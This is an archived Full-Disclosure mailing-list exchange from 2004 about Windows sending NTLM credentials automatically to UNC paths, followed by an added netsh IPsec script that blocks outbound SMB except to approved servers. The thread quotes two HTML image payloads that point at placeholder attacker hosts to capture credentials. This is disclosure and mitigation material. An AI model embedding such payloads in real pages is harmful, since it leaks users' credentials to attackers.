Subject: Re[2]: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP
Date: Wed, 29 Sep 2004 10:52:42 +0400
Dear Hidenobu Seki,

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

I have the same question. I had a discussion on this topic with the Microsoft security team again just a few weeks ago (and 2 more discussions during the last 4 years). They accepted this problem and have re-opened the case (MSRC 5468lw) but gave no timelines for a solution. I think MS doesn't understand the problem completely. For example, they still believe SMB signing prevents NTLM relaying attacks, while SMB signing doesn't prevent even the simplest port redirection, because the IP address is not signed.

Currently there is no way to mitigate this problem except filtering outgoing NetBIOS and CIFS requests by implementing a domain-wide IP Security policy that allows SMB and CIFS communication only with file servers/domain controllers (if somebody is interested I can publish step-by-step instructions, but I believe MS should publish a KB article describing this configuration).

I don't think the problem reported by you is a different issue; it's just another exploit scenario for the same problem. I know a few more tricks to redirect a user to a UNC share.

--Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A@SECURITY.NNOV.RU:

From: 3APA3A <3APA3A@SECURITY.NNOV.RU>

This problem has been known since at least 1997 and can still be exploited with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word document.

HS> It is not true.
HS> They are different problems that produce the same phenomenon.

HS> Mr. Cesar Cerrudo taught me that <img src=file://\\www.xxx.yyy\test> still works.

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

HS> Kind regards,
HS> Urity




-- 
~/ZARAZA
A new type of elementary particle has appeared: cracklings (shkvarki).
Not very large, slightly burnt. (Lem)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
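The mitigation 3APA3A describes above (a domain-wide IP Security policy that lets SMB/CIFS and NetBIOS traffic leave the workstation only towards known file servers and domain controllers) is shown here as an added example; it is not the step-by-step instructions he offers in the thread, which were never posted. It uses the legacy `netsh ipsec static` interface of the Windows XP / Server 2003 era the thread is set in. The server addresses 10.0.0.10 and 10.0.0.11, the policy and filter-list names, and the use of the local policy store are all assumptions for illustration.

```powershell
# Added example, not from the thread: IPsec filter policy that blocks outbound
# SMB/CIFS (TCP 445, TCP 139) and NetBIOS (UDP 137/138) from this host except
# to an explicit list of file servers and domain controllers.
# Run as an administrator. Names carry no spaces so they pass to netsh unquoted.

$Policy  = "Restrict-Outbound-SMB"
$Servers = @("10.0.0.10", "10.0.0.11")   # assumption: real file server / DC addresses go here

# 1. Policy container, created unassigned. This writes the local store; for a
#    domain-wide deployment point netsh at the domain store first
#    ("netsh ipsec static set store location=domain") or import into a GPO.
netsh ipsec static add policy name=$Policy assign=n

# 2. Filter list that matches every SMB/NetBIOS request this host initiates.
#    mirrored=no: match only the outbound direction (me -> any).
netsh ipsec static add filterlist name=SMB-to-anywhere
netsh ipsec static add filter filterlist=SMB-to-anywhere srcaddr=me dstaddr=any protocol=TCP srcport=0 dstport=445 mirrored=no
netsh ipsec static add filter filterlist=SMB-to-anywhere srcaddr=me dstaddr=any protocol=TCP srcport=0 dstport=139 mirrored=no
netsh ipsec static add filter filterlist=SMB-to-anywhere srcaddr=me dstaddr=any protocol=UDP srcport=0 dstport=137 mirrored=no
netsh ipsec static add filter filterlist=SMB-to-anywhere srcaddr=me dstaddr=any protocol=UDP srcport=0 dstport=138 mirrored=no

# 3. Filter list for the approved servers. IPsec applies the most specific
#    matching filter, so these single-host (mask /32) filters take precedence
#    over the any-address filters above.
netsh ipsec static add filterlist name=SMB-to-servers
foreach ($ip in $Servers) {
    foreach ($port in 445, 139) {
        netsh ipsec static add filter filterlist=SMB-to-servers srcaddr=me dstaddr=$ip dstmask=255.255.255.255 protocol=TCP srcport=0 dstport=$port mirrored=no
    }
    foreach ($port in 137, 138) {
        netsh ipsec static add filter filterlist=SMB-to-servers srcaddr=me dstaddr=$ip dstmask=255.255.255.255 protocol=UDP srcport=0 dstport=$port mirrored=no
    }
}

# 4. Two filter actions and two rules: block the general case, permit the
#    listed servers.
netsh ipsec static add filteraction name=Block-Action action=block
netsh ipsec static add filteraction name=Permit-Action action=permit
netsh ipsec static add rule name=Block-SMB policy=$Policy filterlist=SMB-to-anywhere filteraction=Block-Action
netsh ipsec static add rule name=Permit-SMB-to-servers policy=$Policy filterlist=SMB-to-servers filteraction=Permit-Action

# 5. Assign (activate) the policy and display what is now in effect.
netsh ipsec static set policy name=$Policy assign=y
netsh ipsec static show policy name=$Policy
```

After the policy is assigned, a UNC reference to an address outside the permit list (for example `net use \\10.0.0.99\share`, or an `<IMG SRC="\\10.0.0.99\x\y">` rendered in a browser) should fail to connect at all, so no NTLM exchange leaves the host, while `net use \\10.0.0.10\share` keeps working. The filter lists cover only the SMB and NetBIOS ports the thread talks about; whether the client falls back to any other transport for a UNC path is something to verify on the target OS before relying on the policy.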
